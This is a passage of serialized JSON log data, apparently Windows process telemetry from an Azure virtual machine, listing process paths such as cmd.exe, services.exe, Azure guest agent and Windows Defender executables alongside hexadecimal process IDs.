exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"C:\\\\Windows\\\\System32\\\\services.exe\",\"NaN\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64\\\\DesiredStateConfiguration\\\\DscRun.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\WaAppAgent.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-14_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"NaN\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MsMpEng.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\mpam-d3ea18d4.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MsMpEng.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MsMpEng.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MsMpEng.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MsMpEng.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\",\"NaN\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\wuauclt.exe\",\"C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\"],\"ProcessId\":[\"NaN\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0xe24\",\"0x8f0\",\"0xe24\",\"0x1158\",\"0x1158\",\"0xe24\",\"0x20b4\",\"0xe24\",\"0x22c0\",\"0xe24\",\"0x1af0\",\"0x1af0\",\"0xe24\",\"0x644\",\"0xe24\",\"0x1290\",\"0xe24\",\"0x2274\",\"0xe24\",\"0x91c\",\"0xe24\",\"0xf10\",\"0xe24\",\"0x1a00\",\"0xe24\",\"0xe10\",\"0xe10\",\"0xe10\",\"0xe24\",\"0x12f8\",\"0xe24\",\"0xbd8\",\"0xe24\",\"0xf60\",\"0xe24\",\"0x8c4\",\"0xe24\",\"0xb10\",\"0xe24\",\"0x17e0\",\"0xe24\",\"0x15b8\",\"0xe24\",\"0xec0\",\"0xe24\",\"0xdd0\",\"0xe24\",\"0x22dc\",\"0xe24\",\"0x838\",\"0xe24\",\"0xe2c\",\"0xe24\",\"0x16e0\",\"0xe24\",\"0x1c84\",\"0xe24\",\"0x1b64\",\"0xe24\",\"0x690\",\"0xe24\",\"0x1c20\",\"0xe24\",\"0x1280\",\"0xe24\",\"0x650\",\"0xe24\",\"0x1584\",\"0xe24\",\"0x490\",\"0xe24\",\"0xfc0\",\"0xe24\",\"0xa14\",\"0xe24\",\"0x1ce4\",\"0xe24\",\"0xcc8\",\"0xe24\",\"0x8f8\",\"0xe24\",\"0x1614\",\"0xe24\",\"0x1850\",\"0xe24\",\"0x1610\",\"0xe24\",\"0x1080\",\"0xe24\",\"0x1248\",\"0xe24\",\"0x1044\",\"0xe24\",\"0xf08\",\"0xe24\",\"0xa78\",\"0xe24\",\"0xd74\",\"0xe24\",\"0x23d8\",\"0xe24\",\"0x3f8\",\"0xe24\",\"0x23b8\",\"0xe24\",\"0x1548\",\"0xe24\",\"0x10a8\",\"0xe24\",\"0x5a8\",\"0xe24\",\"0xf88\",\"0xe24\",\"0x18b8\",\"0xe24\",\"0x16e8\",\"0xe24\",\"0x1d04\",\"0xe24\",\"0xda8\",\"0xe24\",\"0x1f20\",\"0xe24\",\"0xe3c\",\"0xe24\",\"0x1fa4\",\"0xe24\",\"0x220c\",\"0xe24\",\"0x650\",\"0xe24\",\"0x1570\",\"0xe24\",\"0xf60\",\"0xe24\",\"0x154c\",\"0xe24\",\"0xc60\",\"0xe24\",\"0x638\",\"0xe24\",\"0x15fc\",\"0xe24\",\"0x1d38\",\"0xe24\",\"0x17b0\",\"0xe24\",\"0x17d0\",\"0xe24\",\"0x1fd0\",\"0xe24\",\"0x2120\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"0x270\",\"NaN\",\"0x798\",\"0x14ec\",\"NaN\",\"0xb3c\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0x1684\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0xd74\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x2368\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x6f8\",\"0x205c\",\"0x205c\",\"0x205c\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x2080\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1be0\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x108c\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1928\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x12f8\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1368\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0x1124\",\"0xb3c\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0x23d8\",\"0xb3c\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xd60\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0x1588\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xcac\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1770\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x53c\",\"0xb3c\",\"0xb3c\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x16e8\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x21b0\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x1f7c\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x2274\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x494\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0x11dc\",\"0xb3c\",\"0x1454\",\"0x1454\",\"0x1844\",\"0xb3c\",\"0xb3c\",\"0x1ef4\",\"0xb3c\",\"0x1d3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x594\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x17e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x23d8\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x1480\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0x13e0\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x634\",\"0xb3c\",\"0xb3c\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x12e0\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0xe00\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1f60\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0xe08\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0x1b50\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0xfc8\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0xadc\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x212c\",\"0xeb0\",\"0x212c\",\"0x212c\",\"0x212c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x107c\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1ef4\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0x1a5c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xc5c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0xb3c\",\"0x1770\",\"0x1770